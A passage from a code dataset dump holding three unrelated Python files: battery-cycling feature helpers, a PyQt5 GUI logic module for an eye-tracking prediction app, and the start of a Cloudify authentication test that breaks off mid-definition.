cycle number at which you want to get the feature, such as 37 or 142\n Returns:\n two floats\n the variance of the diag_num - cycle 2 for HPPC resistance for both charge and discharge\n '''\n data = processed_cycler_run.diagnostic_interpolated\n cycle_hppc = data.loc[data.cycle_type == 'hppc']\n cycle_hppc = cycle_hppc.loc[cycle_hppc.current.notna()]\n cycles = cycle_hppc.cycle_index.unique()\n if diag_num not in cycles:\n return None\n steps = [11, 12, 14]\n states = ['R', 'D', 'C']\n results_0 = {}\n results = {}\n resistance = {}\n dr_d = {}\n cycle_hppc_0 = cycle_hppc.loc[cycle_hppc.cycle_index == 2]\n # in case that cycle 2 correspond to two cycles one is real cycle 2, one is at the end\n cycle_hppc_0 = cycle_hppc_0.loc[cycle_hppc_0.test_time < 250000]\n for i in range(len(steps)):\n chosen = cycle_hppc_0[cycle_hppc_0.step_index == steps[i]]\n state = states[i]\n result = get_V_I(chosen)\n results_0[state] = result\n results[2] = results_0\n steps_later = [43, 44, 46]\n # step 43 is rest, 44 is discharge and 46 is charge, use the get ocv function to get the voltage values\n # and calculate the over potential and thus the resistance change\n for i in range(1, len(cycles)):\n chosen = cycle_hppc[cycle_hppc.cycle_index == cycles[i]]\n results_s = {}\n for j in range(len(steps_later)):\n chosen_s = chosen[chosen.step_index == steps_later[j]]\n state = states[j]\n results_s[state] = get_V_I(chosen_s)\n results[cycles[i]] = results_s\n # calculate the resistance and compare the cycle evolution\n keys = list(results.keys())\n resistance['D'] 
= {}\n resistance['C'] = {}\n for i in range(len(keys)):\n d_v = results[keys[i]]['D']['voltage'] # discharge voltage for a cycle\n c_v = results[keys[i]]['C']['voltage'] # charge voltage for a cycle\n r_v = results[keys[i]]['R']['voltage'] # rest voltage for a cycle\n r_v_d = r_v[0:min(len(r_v), len(d_v))] # in case the size is different\n d_v = d_v[0:min(len(r_v), len(d_v))]\n c_v = c_v[0:min(len(r_v), len(c_v))]\n r_v_c = r_v[0:min(len(r_v), len(c_v))]\n d_n = list(np.array(d_v) - np.array(r_v_d)) # discharge overpotential\n c_n = list(np.array(c_v) - np.array(r_v_c)) # charge overpotential\n resistance['D'][keys[i]] = np.true_divide(d_n, results[keys[i]]['D']['current'])\n resistance['C'][keys[i]] = np.true_divide(c_n, results[keys[i]]['C']['current'])\n resistance_d = resistance['D']\n resistance_c = resistance['C']\n dr_c = {}\n SOC = list(range(10, 100, 10))\n for i in range(1, len(keys)):\n resistance_d_i = resistance_d[keys[i]]\n resistance_d_0 = resistance_d[keys[0]]\n resistance_d_0 = resistance_d_0[0:min(len(resistance_d_i), len(resistance_d_0))]\n dr_d[keys[i]] = list(resistance_d_i - resistance_d_0)\n for i in range(1, len(keys)):\n resistance_c_i = resistance_c[keys[i]]\n resistance_c_0 = resistance_c[keys[0]]\n resistance_c_0 = resistance_c_0[0:min(len(resistance_c_i), len(resistance_c_0))]\n dr_c[keys[i]] = list(resistance_c_i - resistance_c_0)\n f2_d = np.var(dr_d[diag_num])\n f2_c = np.var(dr_c[diag_num])\n return f2_d, f2_c\n\n\ndef get_V_I(df):\n \"\"\"\n this helper functiion takes in a specific step in the first hppc cycle and gives you the voltage values as\n well as the current values after each step in the first cycle.\n \"\"\"\n result = {}\n voltage = []\n current = []\n step_index_counters = df.step_index_counter.unique()[0:9]\n for i in range(len(step_index_counters)):\n df_i = df.loc[df.step_index_counter == step_index_counters[i]]\n voltage.append(df_i['voltage'].iloc[-1]) # the last point of the voltage value\n current.append(df_i['current'].mean())\n result['voltage'] = voltage\n result['current'] = current\n return result\n\n\ndef get_v_diff(diag_num, processed_cycler_run, soc_window):\n \"\"\"\n This function helps us get the feature of the variance of the voltage difference\n across a specific capacity window\n Argument:\n diag_num(int): diagnostic cycle number at which you want to get the feature, such as 37 or 142\n processed_cycler_run(process_cycler_run object)\n soc_window(int): let the function know which step_counter_index you want to look at\n Returns:\n a float\n \"\"\"\n data = processed_cycler_run.diagnostic_interpolated\n hppc_data = data.loc[data.cycle_type == 'hppc']\n # the discharge steps in the hppc cycles step number 47\n hppc_data_2 = hppc_data.loc[hppc_data.cycle_index == diag_num]\n hppc_data_1 = hppc_data.loc[hppc_data.cycle_index == 2]\n # in case a final HPPC is appended in the end also with cycle number 2\n hppc_data_1 = hppc_data_1.loc[hppc_data_1.discharge_capacity < 8]\n hppc_data_2_d = hppc_data_2.loc[hppc_data_2.step_index == 47]\n hppc_data_1_d = hppc_data_1.loc[hppc_data_1.step_index == 15]\n step_counters_1 = hppc_data_1_d.step_index_counter.unique()\n step_counters_2 = hppc_data_2_d.step_index_counter.unique()\n if (len(step_counters_1) < 8) or (len(step_counters_2) < 8):\n print('error')\n return None\n else:\n chosen_1 = hppc_data_1_d.loc[hppc_data_1_d.step_index_counter == step_counters_1[soc_window]]\n chosen_2 = hppc_data_2_d.loc[hppc_data_2_d.step_index_counter == step_counters_2[soc_window]]\n chosen_1 = 
chosen_1.loc[chosen_1.discharge_capacity.notna()]\n chosen_2 = chosen_2.loc[chosen_2.discharge_capacity.notna()]\n if len(chosen_1) == 0 or len(chosen_2) == 0:\n print('error')\n return None\n f = interp(chosen_2)\n v_1 = chosen_1.voltage.tolist()\n v_2 = f(chosen_1.discharge_capacity).tolist()\n v_diff = list_minus(v_1, v_2)\n if abs(np.var(v_diff)) > 1:\n print('weird voltage')\n return None\n else:\n return v_diff\n\n\ndef get_relaxation_times(voltage_data, time_data, decay_percentage = [0.5, 0.8, 0.99]):\n \"\"\"\n This function takes in the voltage data and time data of a voltage relaxation curve\n and calculates out the time it takes to reach 50%, 80% and 99% of the OCV relaxation.\n\n Args:\n voltage_data(np.array): list of the voltage data in a voltage relaxation curve\n time_data(np.array) : list of the time data corresponding to voltage data\n decay_percentage (list): list of thresholds to compute time constants for\n\n Returns:\n @time_array(np.array): list of time taken to reach percentage of total relaxation\n where percentages are 50%, 80%, and 99% returned in that order.\n\n \"\"\"\n\n # Scaling the voltage data to between 0-1\n final_voltage = voltage_data[-1]\n initial_voltage = voltage_data[0]\n scaled_voltage_data = (voltage_data - initial_voltage) / (final_voltage - initial_voltage)\n\n # shifting the time data to start at 0\n shifted_time_data = time_data - time_data[0]\n\n v_decay_inv = interp1d(scaled_voltage_data, shifted_time_data)\n\n # these are the decay percentages that will correspond to the time values extracted\n time_array = []\n\n for percent in decay_percentage:\n time_array.append(v_decay_inv(percent))\n\n return np.array(time_array)\n\n\ndef get_relaxation_features(processed_cycler_run):\n \"\"\"\n\n This function takes in the processed structure data and retrieves the fractional change in\n the time taken to reach 50%, 80% and 99% of the voltage decay between the first and\n the second HPPC cycles\n\n Args:\n @processed_cycler_run(beep.structure.ProcessedCyclerRun): ProcessedCyclerRun object for the cell\n you want the diagnostic feature for.\n\n Returns:\n @fracTimeArray(np.array): list of fractional difference in time taken to reach percentage of\n total relaxation between the first and second diagnostic cycle. 
It is organized such that\n the percentages 50%, 80%, and 99% correspond to a given column, and the rows are different\n SOCs of the HPPC starting at 0 with the highest SOC and going downwards.\n \"\"\"\n\n total_time_array = []\n\n # chooses the first and the second diagnostic cycle\n for hppc_chosen in [0, 1]:\n\n # Getting just the HPPC cycles\n hppc_diag_cycles = processed_cycler_run.diagnostic_interpolated[processed_cycler_run.diagnostic_interpolated.cycle_type == \"hppc\"]\n\n # Getting unique and ordered cycle index list for HPPC cycles, and choosing the hppc cycle\n hppc_cycle_list = list(set(hppc_diag_cycles.cycle_index))\n hppc_cycle_list.sort()\n\n # Getting unique and ordered Regular Step List (Non-unique identifier)\n reg_step_list = hppc_diag_cycles[hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]].step_index\n reg_step_list = list(set(reg_step_list))\n reg_step_list.sort()\n\n # The value of 1 for regular step corresponds to all of the relaxation curves in the hppc\n reg_step_relax = 1\n\n # Getting unique and ordered Step Counter List (unique identifier)\n step_count_list = hppc_diag_cycles[(hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]) &\n (hppc_diag_cycles.step_index == reg_step_list[reg_step_relax])].step_index_counter\n step_count_list = list(set(step_count_list))\n step_count_list.sort()\n # The first one isn't a proper relaxation curve(comes out of CV) so we ignore it\n step_count_list = step_count_list[1:]\n\n # 9x2 array where the rows are the different SOC starting high to low and columns are percent degrad\n # initialized to all nans so when they can't be calculated it has a nan in its place\n all_time_array = np.nan * np.ones((9, 3))\n\n # gets all the times for a single SOC per loop\n for soc_num in range(0, len(step_count_list)):\n relax_curve_df = hppc_diag_cycles[(hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]) &\\\n (hppc_diag_cycles.step_index_counter == step_count_list[soc_num])]\n\n time_array = get_relaxation_times(np.array(relax_curve_df.voltage), np.array(relax_curve_df.test_time))\n all_time_array[soc_num][:] = time_array\n\n total_time_array.append(all_time_array)\n\n return total_time_array[1] / total_time_array[0]\n\n","sub_path":"beep/helpers/featurizer_helpers.py","file_name":"featurizer_helpers.py","file_ext":"py","file_size_in_byte":22553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121043279","text":"import os.path\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QFileDialog, QMessageBox\nfrom PyQt5 import QtCore, QtWidgets, uic\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom modules.program_manager import *\nfrom pathlib import Path\n\napp = None # global variable bound to the QtWidgets.QApplication instance.\nmain_window = None # global variable bound to EyePredict application object.\n\nclass PredictionThread(QThread):\n \"\"\"\n Thread object class, used for \"Predict\" tab's processes.\n \"\"\"\n\n # A signal preparation\n alert = pyqtSignal(str)\n\n def __init__(self, program_manager, action, features=[], exclusion_category=\"\", num_to_exclude=\"\", iterations=\"\"):\n \"\"\"\n Make a new thread instance with the specified arguments.\n All arguments used for prediction processes, some arguments are optional for some prediction actions.\n :param program_manager: The program manger to activate by predication actions request/s.\n :param action: The requested action to preform (\"Cross Validation\", \"Fit Model\", \"Predict\").\n 
:param features: Selected features to extract.\n :param exclusion_category: column label from the behavioral data, will be used for trial grouping during learning.\n :param num_to_exclude: The number of groups that will be excluded during training (int).\n :param iterations: Maximum iterations number for the training session.\n \"\"\"\n # QThread.__init__(self)\n super(PredictionThread, self).__init__()\n self.program_manager = program_manager\n self.features = features\n self.exclusion_category = exclusion_category\n self.num_to_exclude = num_to_exclude\n self.iterations = iterations\n self.action = action\n\n def __del__(self):\n self.wait()\n\n def run(self):\n \"\"\"\n Begin thread's run, calling the requested prediction actions.\n :return: void\n \"\"\"\n if self.action != \"Cross Validation\" and self.action != \"Fit Model\" and self.action != \"Predict\":\n return\n\n self._block_gui_buttons()\n self._start_prediction_action()\n self.program_manager.reset_stop_flags() # reset flags that have been used to cancel the process.\n self._free_gui_buttons()\n\n def _start_prediction_action(self):\n \"\"\"\n call program_manger with the supplied arguments, and update the \"Result\" label as necessary.\n :return: void \n \"\"\"\n # predict\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 16pt 'Tahoma';\")\n main_window.ResultLable.setText(self.action + \" Process \\nIs Running...\")\n return_string, result = self.program_manager.predict(self.features, self.exclusion_category,\n self.num_to_exclude, self.iterations, self.action)\n # Check the process exit status, and update gui_module accordingly\n if return_string == \"Success\":\n main_window.ResultLable.setText(result)\n else:\n main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n self.alert.emit(return_string)\n\n def _free_gui_buttons(self):\n \"\"\"\n Set all gui_module buttons enable.\n :return: void\n \"\"\"\n # free gui_module functions\n main_window.ReloadButton.setEnabled(True)\n main_window.ApplyButton.setEnabled(True)\n main_window.LoadButton.setEnabled(True)\n main_window.SaveButton.setEnabled(True)\n main_window.VisualizeButton.setEnabled(True)\n main_window.PredictButton.setEnabled(True)\n main_window.CrossValidationButton.setEnabled(True)\n main_window.FitModelButton.setEnabled(True)\n main_window.SaveModelButton.setEnabled(True)\n main_window.LoadModelButton.setEnabled(True)\n main_window.CancelButton.hide()\n main_window.SaveModelButton.show()\n\n def _block_gui_buttons(self):\n \"\"\"\n Set all gui_module buttons disable, to avoid data processing conflicts.\n :return: void\n \"\"\"\n # Block gui_module functions\n main_window.ReloadButton.setEnabled(False)\n main_window.ApplyButton.setEnabled(False)\n main_window.LoadButton.setEnabled(False)\n main_window.SaveButton.setEnabled(False)\n main_window.VisualizeButton.setEnabled(False)\n main_window.PredictButton.setEnabled(False)\n main_window.CrossValidationButton.setEnabled(False)\n main_window.FitModelButton.setEnabled(False)\n main_window.SaveModelButton.setEnabled(False)\n main_window.LoadModelButton.setEnabled(False)\n main_window.CancelButton.show()\n main_window.SaveModelButton.hide()\n\n\nclass Alert(QWidget):\n \"\"\"\n Widget class to pop user messages\n \"\"\"\n def __init__(self, text):\n super().__init__()\n self.title = 'Alert'\n self.left = 1300\n self.top = 800\n self.width = 320\n self.height = 200\n self.text = text\n self.init_ui()\n\n def 
init_ui(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n QMessageBox.warning(self, self.title, self.text, QMessageBox.Ok, QMessageBox.Ok)\n self.show()\n\n\nclass Logic(QWidget):\n \"\"\"\n All the logic methods behind the gui_module activation, and a connection to the program's business logic.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.predict_tab_visited = False\n self.program_manager = ProgramManager()\n self.prediction_thread = None\n\n ##########################################################\n # Start Tab Related Functions #\n ##########################################################\n\n def browse_experiment_info_file(self):\n \"\"\"\n Start tab: \"Browse\" button || Data tab: \"Reload...\" button.\n Choose experiment info file.\n Send it to ProgramManager for processing.\n Display loaded behavioral data DataFrame.\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n path, _ = QFileDialog.getOpenFileName(self, \"Choose Experiment Info File\", \"\",\n \"Text Files (*.txt);;Ini Files (*.ini)\", options=options)\n\n # Check if a file was chosen\n if path:\n # Send it to ProgramManager for processing\n return_string, df = self.program_manager.load(path)\n if return_string == \"Success\":\n # Display loaded behavioral data DataFrame\n self._display_dataframe(df)\n main_window.tabWidget.setCurrentIndex(1)\n # Load prediction labels\n main_window.ExclusionCriteriaComboBox.addItems(self.program_manager.get_exclusion_criteria())\n # update the number of items in the predict tab\n self.set_train_test_num()\n else:\n self._display_dataframe(None)\n main_window.ExclusionCriteriaComboBox.clear()\n Alert(return_string)\n\n ##########################################################\n # Data Tab Related Functions #\n ##########################################################\n\n def load_data_filter_query(self):\n \"\"\"\n Data tab: \"Load...\" button.\n Loads data filtering configurations from a chosen .txt file\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n file_path, _ = QFileDialog.getOpenFileName(self, \"Load configuration\", \"\", \"Text Files (*.txt)\",\n options=options)\n # Check if a file was chosen\n if file_path:\n # Read query from file\n query = Path(file_path).read_text()\n # Write query in text box\n main_window.ConfigurationTextEdit.setText(query)\n\n def save_data_filter_query(self):\n \"\"\"\n Data tab: \"Save\" button.\n Saves data filtering configurations to a chosen .txt file\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n file_path, _ = QFileDialog.getSaveFileName(self, \"Save data filtering configurations\", \"\",\n \"All Files (*);;Text Files (*.txt)\", options=options)\n # Check if a file was chosen\n if file_path:\n # Get query from the configuration text box\n query = main_window.ConfigurationTextEdit.toPlainText()\n\n # Write query to file, create if doesn't exists\n with open(file_path, \"w\") as fd:\n fd.write(query)\n\n def _display_dataframe(self, df):\n \"\"\"\n Receives a DataFrame object, containing behavioral data.\n Loads it to the GUI data table, in the Data tab.\n :param df: a DataFrame \n :return: Void\n \"\"\"\n # clean table\n main_window.DataTable.setColumnCount(0)\n main_window.DataTable.setRowCount(0)\n\n if df is None:\n return\n\n # set table dimensions\n main_window.DataTable.setColumnCount(len(df.columns))\n 
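# rows must exist before the setItem calls below can populate them\n        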
main_window.DataTable.setRowCount(len(df.index))\n\n _translate = QtCore.QCoreApplication.translate\n\n # set headers\n i = 0\n for header in df:\n item = QtWidgets.QTableWidgetItem()\n item.setText(_translate(\"MainWindow\", header))\n main_window.DataTable.setHorizontalHeaderItem(i, item)\n i += 1\n\n # set values\n for i in range(len(df.index)):\n for j in range(len(df.columns)):\n item = QtWidgets.QTableWidgetItem()\n item.setText(_translate(\"MainWindow\", str(df.iat[i, j])))\n main_window.DataTable.setItem(i, j, item)\n\n # Resize table\n main_window.DataTable.resizeColumnsToContents()\n main_window.DataTable.resizeRowsToContents()\n\n def apply_filter_query(self):\n \"\"\"\n Data tab: \"Apply\" button.\n Execute data filter query, and updates data table in Data tab.\n :return: Void\n \"\"\"\n query = main_window.ConfigurationTextEdit.toPlainText()\n\n # Call ProgramManager for query processing\n return_string, df = self.program_manager.filter_data(query)\n if return_string is \"Success\":\n # Display updated data frame\n self._display_dataframe(df)\n # update predict tab (exclusion items number)\n self.set_train_test_num()\n else:\n Alert(return_string)\n\n ##########################################################\n # Visualization Tab Related Functions #\n ##########################################################\n\n def visualize(self):\n \"\"\"\n Visu tab: \"Visualize\" button.\n Collects visualization options and calls visu module to create visualization object and display it.\n :return: Void\n \"\"\"\n # get visualization type to create\n try:\n visu_type = main_window.VisuTypeList.currentItem().text()\n if not main_window.VisuTypeList.currentItem().isSelected():\n raise Exception\n except:\n Alert(\"Please choose a visualization type\")\n return\n\n # get filtering query\n filter_query = main_window.VisuFilterQueryTextEdit.toPlainText()\n\n # get processing method\n process_method = main_window.ProcessingMethodSlider.value() # 0 Simultaneous, 2 MeanCalc\n if process_method is 1: # can be tested later in the chain, and return alert as return_string if needed\n Alert(\"Please choose a processing method\")\n return\n\n # call manager.visualize\n return_string = self.program_manager.visualize(visu_type, filter_query, process_method)\n if not return_string == \"Success\":\n Alert(return_string)\n\n def set_processing_method(self):\n \"\"\"\n Visu tab: \"Processing Method\" slider.\n Styling slider position, using bold font for the chosen method text label. 
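Slider values map to 0 = Simultaneous and 2 = MeanCalc; the middle position 1 selects neither.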
\n :return: void\n \"\"\"\n if main_window.ProcessingMethodSlider.value() is 0:\n main_window.SimultaneousLabel.setStyleSheet(\"font: -10 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n elif main_window.ProcessingMethodSlider.value() is 1:\n main_window.SimultaneousLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n elif main_window.ProcessingMethodSlider.value() is 2:\n main_window.SimultaneousLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: -10 9pt 'Tahoma';\")\n\n ##########################################################\n # Predict Tab Related Functions #\n ##########################################################\n\n def _get_features_list_from_gui(self):\n \"\"\"\n Get the selected features from the list on \"Predict\" tab, and group it in a list.\n :return: List of features names to extract.\n \"\"\"\n features = []\n for index in range(main_window.FeaturesList.count()):\n if main_window.FeaturesList.item(index).checkState() == QtCore.Qt.Checked:\n features.append(main_window.FeaturesList.item(index).text())\n return features\n\n def cross_validation(self):\n \"\"\"\n Predict tab: \"Cross Validate\" button.\n Extract user's chosen prediction options from the gui_module, verify it, and start a new thread for the cross \n validation process.\n :return: void \n \"\"\"\n # extract prediction options from gui_module\n exclusion_category = main_window.ExclusionCriteriaComboBox.currentText()\n num_to_exclude = main_window.ExcludeLineEdit.text()\n iterations = main_window.IterationsLineEdit.text()\n features = self._get_features_list_from_gui()\n\n # verify the input\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n if (not num_to_exclude.isdigit()) or int(num_to_exclude) < 1 or \\\n int(num_to_exclude) >= int(main_window.ItemsAmountLabel.text()):\n Alert(\"Exclusion amount must be larger than 0 and smaller than the total items count. 
Digits only.\")\n return\n if iterations != \"-1\":\n if (not iterations.isdigit()) or int(iterations) < 1:\n Alert(\"Cross validation iterations number must be digits only, -1 or larger than 1.\")\n return\n else:\n if int(num_to_exclude) != 1:\n Alert(\"Max iteration (-1) is only allowed when the exclusion amount is 1.\")\n return\n\n # begin\n self._start_prediction_thread(\"Cross Validation\", features=features, exclusion_category=exclusion_category,\n num_to_exclude=num_to_exclude, iterations=iterations)\n\n def fit_model(self):\n \"\"\"\n Predict tab: \"Fit Model\" button.\n Extract user's chosen features from the gui_module, verify, and start a new thread for the model fitting process.\n :return: void \n \"\"\"\n features = self._get_features_list_from_gui()\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n self._start_prediction_thread(\"Fit Model\", features=features)\n\n def predict(self):\n \"\"\"\n Predict tab: \"Predict\" button.\n Extract user's chosen features from the gui_module, verify, and start a new thread for the prediction process.\n :return: void \n \"\"\"\n features = self._get_features_list_from_gui()\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n self._start_prediction_thread(\"Predict\", features=features)\n\n def _start_prediction_thread(self, action, features=[], exclusion_category=\"\", num_to_exclude=\"\", iterations=\"\"):\n \"\"\"\n Create prediction thread instance, connect it to a signal, and start the threads run.\n :param action: The prediction action to preform.\n :param features: Selected features to extract.\n :param exclusion_category: column label from the behavioral data, will be used for trial grouping during learning.\n :param num_to_exclude: The number of groups that will be excluded during training (int).\n :param iterations: Maximum iterations number for the training session.\n :return: void\n \"\"\"\n self.prediction_thread = PredictionThread(self.program_manager, action, features=features,\n exclusion_category=exclusion_category, num_to_exclude=num_to_exclude,\n iterations=iterations)\n self.prediction_thread.alert.connect(self.raise_alert)\n self.prediction_thread.start()\n\n def save_model(self):\n \"\"\"\n Predict tab: \"Save Model\" button.\n Saves prediction model to a chosen .pkl file (pickle).\n :return: Void\n \"\"\"\n # Pop up file dialog to choose a path for saving\n options = QFileDialog.Options()\n path, _ = QFileDialog.getSaveFileName(self, \"Save Model\", \"\",\n \"Pickle files (*.pkl)\", options=options)\n # If a path was chosen, begin saving\n if path:\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 18pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Saving Model...\")\n return_string = self.program_manager.save_ml_model(path)\n\n # Update gui_module with the saving results, fail/success.\n if return_string == \"Success\":\n main_window.ResultLable.setText(\"Model Saved.\")\n else:\n main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n Alert(return_string)\n\n def load_model(self):\n \"\"\"\n Predict tab: \"Load Model\" button.\n Loads a trained prediction model from a chosen .pkl file (pickle).\n :return: Void\n \"\"\"\n # Pop up file dialog to choose the model to load\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n path, _ = QFileDialog.getOpenFileName(self, \"Choose a pickled model to load\", \"\",\n 
\"Pickle Files (*.pkl)\", options=options)\n # If a path was chosen, load the model\n if path:\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 18pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Loading Model...\")\n return_string = self.program_manager.load_ml_model(path)\n\n # Update gui_module with the loading results, fail/success.\n if return_string == \"Success\":\n main_window.MLModelComboBox.clear()\n main_window.MLModelComboBox.addItems(self.program_manager.get_available_models())\n main_window.ResultLable.setText(\"Model List Updated\")\n else:\n main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n Alert(return_string)\n\n def raise_alert(self, text):\n \"\"\"\n Linking method between prediction threads and gui_module Alert object (using signals).\n :param text: Text to present. \n :return: void\n \"\"\"\n Alert(text)\n\n def stop_thread(self):\n \"\"\"\n Predict tab: \"Cancel\" button.\n Stop prediction processing.\n :return: void\n \"\"\"\n main_window.ResultLable.setText(\"Canceling...\")\n self.program_manager.stop_prediction()\n\n def set_train_test_num(self):\n \"\"\"\n Predict tab: \"Exclusion Criteria\" option.\n When an exclusion criteria is chosen, this method is called to update the existing items amount label.\n Items amount is based on the chosen criteria.\n Sets a default items number in the exclude line edit, as 25% of the existing items.\n :return: void\n \"\"\"\n # Get existing items amount for the chosen criteria & set the gui_module label\n label = main_window.ExclusionCriteriaComboBox.currentText()\n total = self.program_manager.get_different_items_amount_by_label(label)\n main_window.ItemsAmountLabel.setText(str(total))\n # Set default exclude value\n exclude = int((total*25)/100)\n main_window.ExcludeLineEdit.setText(str(exclude))\n\n def set_ml_model(self):\n \"\"\"\n Predict tab: \"ML Model\" list.\n Load available models.\n :return: void\n \"\"\"\n try:\n # Load available models list. Will work only after the app is up and running\n self.program_manager.set_ml_model(main_window.MLModelComboBox.currentText())\n except:\n # app initialization isn't finished, and main_window doesn't exists yet\n pass\n\n def set_extractor_and_load_features(self):\n \"\"\"\n Predict tab: \"Feature Extractor\" list.\n Load available extractors.\n :return: void\n \"\"\"\n try:\n # load available extractors list. will work only after the app is up and running\n self.program_manager.set_extractor(main_window.ExtractorComboBox.currentText())\n\n # load available features list. 
will work only after extractors loading\n main_window.FeaturesList.clear()\n main_window.FeaturesList.addItems(self.program_manager.get_ml_features())\n for index in range(main_window.FeaturesList.count()):\n item = main_window.FeaturesList.item(index)\n item.setCheckState(QtCore.Qt.Unchecked)\n except:\n # app initialization isn't finished, and main_window doesn't exists yet\n pass\n\n def tab_changed(self):\n \"\"\"\n Tab change event activates this method.\n Disables the start tab.\n Updates \"Predict\" tab's lists (only on the first visit of that tab).\n :return: \n \"\"\"\n main_window.tabWidget.setTabEnabled(0, False)\n\n if (not self.predict_tab_visited) and main_window.tabWidget.tabText(main_window.tabWidget.currentIndex()) == \"Predict\":\n self.set_ml_model()\n self.set_extractor_and_load_features()\n self.predict_tab_visited = True\n\n\n# Global GUI information\nqtCreatorFile = \"EyePredict_gui.ui\"\nUi_MainWindow, QtBaseClass = uic.loadUiType(os.path.dirname(__file__) + \"/\" + qtCreatorFile)\n\n\nclass EyePredictApp(QtWidgets.QMainWindow, Ui_MainWindow):\n \"\"\"\n The application object class. Creates the Eye-predict GUI.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Application initiating method.\n \"\"\"\n # Open EyePredict application\n QtWidgets.QMainWindow.__init__(self)\n Ui_MainWindow.__init__(self)\n self.setupUi(self)\n\n # Activate buttons, load list options\n self.logic = Logic()\n self._connect()\n self._load_lists_items()\n\n def _connect(self):\n \"\"\"\n Connect gui_module functions (such as buttons, lists, etc) to logic methods.\n :return: Void\n \"\"\"\n # Main + Data\n self.BrowseButton.clicked.connect(self.logic.browse_experiment_info_file)\n self.ReloadButton.clicked.connect(self.logic.browse_experiment_info_file)\n self.ApplyButton.clicked.connect(self.logic.apply_filter_query)\n self.LoadButton.clicked.connect(self.logic.load_data_filter_query)\n self.SaveButton.clicked.connect(self.logic.save_data_filter_query)\n # Visualization\n self.ProcessingMethodSlider.valueChanged.connect(self.logic.set_processing_method)\n self.VisualizeButton.clicked.connect(self.logic.visualize)\n # ML\n self.MLModelComboBox.currentIndexChanged.connect(self.logic.set_ml_model)\n self.ExtractorComboBox.currentIndexChanged.connect(self.logic.set_extractor_and_load_features)\n self.CrossValidationButton.clicked.connect(self.logic.cross_validation)\n self.FitModelButton.clicked.connect(self.logic.fit_model)\n self.PredictButton.clicked.connect(self.logic.predict)\n self.SaveModelButton.clicked.connect(self.logic.save_model)\n self.LoadModelButton.clicked.connect(self.logic.load_model)\n self.ExclusionCriteriaComboBox.currentIndexChanged.connect(self.logic.set_train_test_num)\n self.tabWidget.currentChanged.connect(self.logic.tab_changed)\n self.CancelButton.clicked.connect(self.logic.stop_thread)\n self.CancelButton.hide()\n\n def _load_lists_items(self):\n \"\"\"\n Loads lists information.\n Lists content depends on available implementations, and so is due to changes.\n :return: void\n \"\"\"\n self.VisuTypeList.addItems(self.logic.program_manager.get_visu_types())\n self.MLModelComboBox.addItems(self.logic.program_manager.get_available_models())\n self.ExtractorComboBox.addItems(self.logic.program_manager.get_available_extractors())\n\n\ndef main():\n # Main. 
Program activation.\n global app, main_window\n app = QtWidgets.QApplication(sys.argv)\n main_window = EyePredictApp()\n main_window.show()\n sys.exit(app.exec_())\n","sub_path":"EyePredict/modules/gui_module/gui_logic.py","file_name":"gui_logic.py","file_ext":"py","file_size_in_byte":25898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218030375","text":"########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport shutil\n\nfrom cloudify_rest_client.client import CloudifyClient\nfrom cloudify_rest_client.exceptions import CloudifyClientError\n\nfrom cosmo_tester.test_suites.test_security.security_test_base import \\\n SecurityTestBase\nfrom cosmo_tester.framework import util\n\n\nCUSTOM_AUTH_PROVIDER_PLUGIN = 'mock-auth-provider-with-no-userstore'\nPLUGINS_PROP_PATH = 'node_templates.manager.properties.cloudify.plugins'\n\n\nclass NoUserstoreTests(SecurityTestBase):\n\n def test_authentication_without_userstore(self):\n self.setup_secured_manager()\n self._assert_unauthorized_user_fails()\n\n def get_manager_blueprint_additional_props_override(self):\n src_plugin_dir = util.get_plugin_path(CUSTOM_AUTH_PROVIDER_PLUGIN)\n shutil.copytree(src_plugin_dir,\n self.test_manager_blueprint_path.dirname() /\n CUSTOM_AUTH_PROVIDER_PLUGIN)\n return {PLUGINS_PROP_PATH: self.get_plugins_settings()}\n\n def get_plugins_settings(self):\n return {\n 'user_custom_auth_provider': {\n 